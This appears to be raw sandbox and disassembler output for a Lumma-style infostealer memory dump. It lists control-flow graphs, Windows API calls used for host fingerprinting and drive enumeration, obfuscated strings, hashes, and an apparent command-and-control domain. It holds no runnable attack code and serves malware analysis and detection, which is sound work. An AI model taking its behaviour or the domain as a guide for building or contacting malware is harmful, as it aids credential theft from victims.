                                                                                                                  control_flow_graph 0 4361e0-436202 1 436210-436222 0->1 1->1 2 436224-436235 1->2 3 436240-436272 2->3 3->3 4 436274-4362b1 3->4 5 4362c0-436342 4->5 5->5 6 436348-436367 5->6 8 436374-43637f 6->8 9 436369 6->9 10 436380-4363bd 8->10 9->8 10->10 11 4363bf-436416 CoCreateInstance 10->11 12 4367c2-4367ee call 43c280 GetVolumeInformationW 11->12 13 43641c-43644f 11->13 18 4367f0-4367f4 12->18 19 4367f8-4367fa 12->19 15 436450-436463 13->15 15->15 17 436465-43648f SysAllocString 15->17 22 4367b2-4367be SysFreeString 17->22 23 436495-4364af CoSetProxyBlanket 17->23 18->19 21 436817-43681e 19->21 24 436820-436827 21->24 25 436837-43684f 21->25 22->12 26 4364b5-4364ca 23->26 27 4367a8-4367ae 23->27 24->25 28 436829-436835 24->28 29 436850-436862 25->29 31 4364d0-4364f4 26->31 27->22 28->25 29->29 30 436864-4368a8 29->30 32 4368b0-43692d 30->32 31->31 33 4364f6-436576 SysAllocString 31->33 32->32 34 43692f-43696a call 41dd50 32->34 35 436580-43659a 33->35 39 436970-436978 34->39 35->35 37 43659c-4365cc SysAllocString 35->37 42 4365d2-4365f4 37->42 43 436796-4367a6 SysFreeString * 2 37->43 39->39 41 43697a-43697c 39->41 44 436982-436992 call 407fe0 41->44 45 436800-436811 41->45 50 4365fa-4365fd 42->50 51 43678c-436792 42->51 43->27 44->45 45->21 47 436997-43699e 45->47 50->51 52 436603-436608 50->52 51->43 52->51 53 43660e-436656 VariantInit 52->53 54 436660-436690 53->54 54->54 55 436692-4366a4 54->55 56 4366a8-4366aa 55->56 57 4366b0-4366b6 56->57 58 436774-436785 VariantClear 56->58 57->58 59 4366bc-4366ca 57->59 58->51 60 43670d 59->60 61 4366cc-4366d1 59->61 64 43670f-436737 call 407f60 call 408d90 60->64 63 4366ec-4366f0 61->63 65 4366f2-4366fb 63->65 66 4366e0 63->66 75 436739 64->75 76 43673e-43674a 64->76 70 436702-436706 65->70 71 4366fd-436700 65->71 69 4366e1-4366ea 66->69 69->63 69->64 70->69 73 436708-43670b 70->73 71->69 73->69 75->76 77 436751-436771 call 407f90 call 407f70 76->77 78 43674c 76->78 77->58 78->77
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                  • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                  • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                  • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                  • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                  • API String ID: 2573436264-4124187736
                                                                                                                  • Opcode ID: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
                                                                                                                  • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                  • Opcode Fuzzy Hash: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
                                                                                                                  • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 89 42b4fc-42b558 call 43c280 93 42b560-42b594 89->93 93->93 94 42b596-42b5a0 93->94 95 42b5a2-42b5a9 94->95 96 42b5bb-42b5c8 94->96 97 42b5b0-42b5b9 95->97 98 42b5ca-42b5d8 96->98 99 42b5ed 96->99 97->96 97->97 100 42b5e0-42b5e9 98->100 101 42b5f4-42b662 FreeLibrary call 43c280 GetComputerNameExA 99->101 100->100 102 42b5eb 100->102 106 42b670-42b6ac 101->106 102->101 106->106 107 42b6ae-42b6b8 106->107 108 42b6ba-42b6c1 107->108 109 42b6db-42b6e8 107->109 112 42b6d0-42b6d9 108->112 110 42b6ea-42b6f1 109->110 111 42b70b-42b75f GetComputerNameExA 109->111 113 42b700-42b709 110->113 114 42b760-42b791 111->114 112->109 112->112 113->111 113->113 114->114 115 42b793-42b79d 114->115 116 42b7bb-42b7c8 115->116 117 42b79f-42b7a6 115->117 119 42b7ca-42b7d1 116->119 120 42b7eb-42b83f 116->120 118 42b7b0-42b7b9 117->118 118->116 118->118 121 42b7e0-42b7e9 119->121 123 42b840-42b864 120->123 121->120 121->121 123->123 124 42b866-42b870 123->124 125 42b872-42b879 124->125 126 42b88b-42b898 124->126 127 42b880-42b889 125->127 128 42b89a-42b8a1 126->128 129 42b8bb-42b914 call 43c280 126->129 127->126 127->127 130 42b8b0-42b8b9 128->130 134 42b920-42b9a2 129->134 130->129 130->130 134->134 135 42b9a8-42b9b2 134->135 136 42b9b4-42b9bb 135->136 137 42b9cb-42b9e2 135->137 138 42b9c0-42b9c9 136->138 139 42b9e8-42b9ef 137->139 140 42bb29-42bb63 137->140 138->137 138->138 141 42b9f0-42b9fa 139->141 142 42bb70-42bb9e 140->142 143 42ba10-42ba16 141->143 144 42b9fc-42ba01 141->144 142->142 145 42bba0-42bbac 142->145 147 42ba40-42ba50 143->147 148 42ba18-42ba1b 143->148 146 42bad0-42bad4 144->146 149 42bbcb-42bbce call 42f3e0 145->149 150 42bbae-42bbb5 145->150 156 42bad6-42bade 146->156 153 42ba56-42ba59 147->153 154 42baea-42baf2 147->154 148->147 151 42ba1d-42ba32 148->151 158 42bbd3-42bbf3 149->158 152 42bbc0-42bbc9 150->152 151->146 152->149 152->152 153->154 157 42ba5f-42bac8 153->157 154->156 160 42baf4-42baf7 154->160 156->140 159 42bae0-42bae2 156->159 157->146 159->141 161 42bae8 159->161 162 42bb25-42bb27 160->162 163 42baf9-42bb23 160->163 161->140 162->146 163->146
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042B5FE
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ComputerName$FreeLibrary
                                                                                                                  • String ID: %(#}$/$/26-$1
                                                                                                                  • API String ID: 2243422189-261129489
                                                                                                                  • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                  • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                  • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                  • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 168 42b4f7-42b60f call 43c280 171 42b614-42b662 GetComputerNameExA 168->171 172 42b670-42b6ac 171->172 172->172 173 42b6ae-42b6b8 172->173 174 42b6ba-42b6c1 173->174 175 42b6db-42b6e8 173->175 178 42b6d0-42b6d9 174->178 176 42b6ea-42b6f1 175->176 177 42b70b-42b75f GetComputerNameExA 175->177 179 42b700-42b709 176->179 180 42b760-42b791 177->180 178->175 178->178 179->177 179->179 180->180 181 42b793-42b79d 180->181 182 42b7bb-42b7c8 181->182 183 42b79f-42b7a6 181->183 185 42b7ca-42b7d1 182->185 186 42b7eb-42b83f 182->186 184 42b7b0-42b7b9 183->184 184->182 184->184 187 42b7e0-42b7e9 185->187 189 42b840-42b864 186->189 187->186 187->187 189->189 190 42b866-42b870 189->190 191 42b872-42b879 190->191 192 42b88b-42b898 190->192 193 42b880-42b889 191->193 194 42b89a-42b8a1 192->194 195 42b8bb-42b914 call 43c280 192->195 193->192 193->193 196 42b8b0-42b8b9 194->196 200 42b920-42b9a2 195->200 196->195 196->196 200->200 201 42b9a8-42b9b2 200->201 202 42b9b4-42b9bb 201->202 203 42b9cb-42b9e2 201->203 204 42b9c0-42b9c9 202->204 205 42b9e8-42b9ef 203->205 206 42bb29-42bb63 203->206 204->203 204->204 207 42b9f0-42b9fa 205->207 208 42bb70-42bb9e 206->208 209 42ba10-42ba16 207->209 210 42b9fc-42ba01 207->210 208->208 211 42bba0-42bbac 208->211 213 42ba40-42ba50 209->213 214 42ba18-42ba1b 209->214 212 42bad0-42bad4 210->212 215 42bbcb-42bbce call 42f3e0 211->215 216 42bbae-42bbb5 211->216 222 42bad6-42bade 212->222 219 42ba56-42ba59 213->219 220 42baea-42baf2 213->220 214->213 217 42ba1d-42ba32 214->217 224 42bbd3-42bbf3 215->224 218 42bbc0-42bbc9 216->218 217->212 218->215 218->218 219->220 223 42ba5f-42bac8 219->223 220->222 226 42baf4-42baf7 220->226 222->206 225 42bae0-42bae2 222->225 223->212 225->207 227 42bae8 225->227 228 42bb25-42bb27 226->228 229 42baf9-42bb23 226->229 227->206 228->212 229->212
                                                                                                                  APIs
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ComputerName
                                                                                                                  • String ID: %(#}$/$/26-$1
                                                                                                                  • API String ID: 3545744682-261129489
                                                                                                                  • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                  • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                  • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                  • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: in~x$kmbj$ydij$Z\
                                                                                                                  • API String ID: 0-979945983
                                                                                                                  • Opcode ID: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
                                                                                                                  • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                  • Opcode Fuzzy Hash: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
                                                                                                                  • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 606 40cff3-40d003 607 40d010-40d03a 606->607 607->607 608 40d03c-40d04e call 408660 call 4361e0 607->608 612 40d053-40d06f 608->612 613 40d070-40d0b1 612->613 613->613 614 40d0b3-40d0ff 613->614 615 40d100-40d157 614->615 615->615 616 40d159-40d163 615->616 617 40d165-40d168 616->617 618 40d17b-40d189 616->618 619 40d170-40d179 617->619 620 40d18b-40d18f 618->620 621 40d19d 618->621 619->618 619->619 623 40d190-40d199 620->623 622 40d1a0-40d1a8 621->622 625 40d1aa-40d1ab 622->625 626 40d1bb-40d1c9 622->626 623->623 624 40d19b 623->624 624->622 627 40d1b0-40d1b9 625->627 628 40d1db-40d29f 626->628 629 40d1cb-40d1cf 626->629 627->626 627->627 631 40d2a0-40d2e3 628->631 630 40d1d0-40d1d9 629->630 630->628 630->630 631->631 632 40d2e5-40d2fe 631->632 633 40d300-40d330 632->633 633->633 634 40d332-40d36e call 40ba00 633->634
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 277DB6F22143AFD2F9F1B7136A1E0C5E$BI$ZG$tacitglibbr.biz$3ej$pr
                                                                                                                  • API String ID: 0-1144176270
                                                                                                                  • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                  • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                  • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                  • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 637 408790-4087a1 call 43a360 640 408970-408972 ExitProcess 637->640 641 4087a7-4087ae call 4336c0 637->641 644 4087b4-4087d8 GetCurrentProcessId GetCurrentThreadId 641->644 645 40896b call 43a930 641->645 646 4087da-4087dc 644->646 647 4087de-408878 SHGetSpecialFolderPathW GetForegroundWindow 644->647 645->640 646->647 649 4088f3-40895f call 409bc0 647->649 650 40887a-4088f1 647->650 649->645 653 408961 call 40cb90 649->653 650->649 655 408966 call 40b9d0 653->655 655->645
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                  • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                    • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
                                                                                                                    • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7
                                                                                                                  • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3676751680-0
                                                                                                                  • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                  • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                  • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                  • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 657 422e93-422e99 658 422ea2 657->658 659 422e9b-422ea0 657->659 660 422ea5-422ec3 call 407f60 658->660 659->660 664 422ed2-422edb 660->664 665 422eca 660->665 666 422ee4 664->666 667 422edd-422ee2 664->667 665->664 668 422eeb-422f1f call 407f60 666->668 667->668 671 422f20-422f66 668->671 671->671 672 422f68-422f70 671->672 673 422f72-422f77 672->673 674 422f91-422f9d 672->674 675 422f80-422f8f 673->675 676 422fc1-422fd9 call 43cb20 674->676 677 422f9f-422fa3 674->677 675->674 675->675 681 423292-4232af 676->681 682 423172 676->682 683 422ff0-422ff9 676->683 684 422fe0-422fe7 676->684 685 423160-423166 call 407f70 676->685 686 423170 676->686 687 42315a 676->687 688 423178-423222 676->688 689 423148-423152 676->689 690 423169-42316f 676->690 678 422fb0-422fbf 677->678 678->676 678->678 694 4232b0-4232c2 681->694 682->688 692 423002 683->692 693 422ffb-423000 683->693 684->683 685->690 686->682 687->685 691 423230-42326a 688->691 689->687 690->686 691->691 696 42326c-42327c call 4210e0 691->696 697 423009-4230af call 407f60 692->697 693->697 694->694 698 4232c4-423346 694->698 703 423281-423284 696->703 707 4230b0-4230c2 697->707 702 423350-42339e 698->702 702->702 705 4233a0-4233c7 call 420df0 702->705 703->681 707->707 708 4230c4-4230cc 707->708 710 4230f1-4230fd 708->710 711 4230ce-4230d5 708->711 713 423121-423141 GetLogicalDrives call 43cb20 710->713 714 4230ff-423103 710->714 712 4230e0-4230ef 711->712 712->710 712->712 713->681 713->682 713->685 713->686 713->687 713->689 713->690 715 423110-42311f 714->715 715->713 715->715
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: )*$X9{;$r1B
                                                                                                                  • API String ID: 0-1001561910
                                                                                                                  • Opcode ID: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
                                                                                                                  • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                  • Opcode Fuzzy Hash: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
                                                                                                                  • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 718 431839-43191a call 414060 GetSystemMetrics * 2 726 431921-4319b2 718->726
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4116985748-3916222277
                                                                                                                  • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                  • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                  • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                  • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 802 40dd25-40dd53 call 431260 call 409700 CoUninitialize 807 40dd60-40dd81 802->807 807->807 808 40dd83-40dd93 807->808 809 40dda0-40ddb2 808->809 809->809 810 40ddb4-40ddfd 809->810 811 40de00-40de2e 810->811 811->811 812 40de30-40de3d 811->812 813 40de5b-40de6b 812->813 814 40de3f-40de42 812->814 816 40de8d 813->816 817 40de6d-40de71 813->817 815 40de50-40de59 814->815 815->813 815->815 819 40de90-40de9b 816->819 818 40de80-40de89 817->818 818->818 820 40de8b 818->820 821 40deab-40deb6 819->821 822 40de9d-40de9f 819->822 820->819 824 40deb8-40deb9 821->824 825 40decb-40ded3 821->825 823 40dea0-40dea9 822->823 823->821 823->823 826 40dec0-40dec9 824->826 827 40ded5-40ded6 825->827 828 40deeb-40def7 825->828 826->825 826->826 831 40dee0-40dee9 827->831 829 40df11-40dfca 828->829 830 40def9-40defb 828->830 833 40dfd0-40e002 829->833 832 40df00-40df0d 830->832 831->828 831->831 832->832 834 40df0f 832->834 833->833 835 40e004-40e01f 833->835 834->829 836 40e020-40e055 835->836 836->836 837 40e057-40e090 call 40ba00 836->837
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Uninitialize
                                                                                                                  • String ID: PT$tacitglibbr.biz
                                                                                                                  • API String ID: 3861434553-1646754259
                                                                                                                  • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                  • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                  • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                  • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: @$ihgf
                                                                                                                  • API String ID: 2994545307-73152791
                                                                                                                  • Opcode ID: e8645669652d7f7de95e8985ed7f10f4c364daeafd1946bf51eda8febbb38cfd
                                                                                                                  • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                  • Opcode Fuzzy Hash: e8645669652d7f7de95e8985ed7f10f4c364daeafd1946bf51eda8febbb38cfd
                                                                                                                  • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: 167H
                                                                                                                  • API String ID: 2994545307-2704650348
                                                                                                                  • Opcode ID: 38450cec291c2e1082ac86020033df8e189db766218c78d431ee3ea45677ee2a
                                                                                                                  • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                  • Opcode Fuzzy Hash: 38450cec291c2e1082ac86020033df8e189db766218c78d431ee3ea45677ee2a
                                                                                                                  • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                  APIs
                                                                                                                  • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: ihgf
                                                                                                                  • API String ID: 2994545307-2948842496
                                                                                                                  • Opcode ID: 51c2d3c48bead1e24f978db54d90992c46589e6659c1f66f49beee17b18db219
                                                                                                                  • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                  • Opcode Fuzzy Hash: 51c2d3c48bead1e24f978db54d90992c46589e6659c1f66f49beee17b18db219
                                                                                                                  • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b18222f22a9ab2b63a400fcffd4b3a34fd29f6efd4115da0d165384394debb5d
                                                                                                                  • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                  • Opcode Fuzzy Hash: b18222f22a9ab2b63a400fcffd4b3a34fd29f6efd4115da0d165384394debb5d
                                                                                                                  • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: e0ef8b023feb42744f45f8ed2eadfcdc6419d00c3a8250a073fef60970476071
                                                                                                                  • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                  • Opcode Fuzzy Hash: e0ef8b023feb42744f45f8ed2eadfcdc6419d00c3a8250a073fef60970476071
                                                                                                                  • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
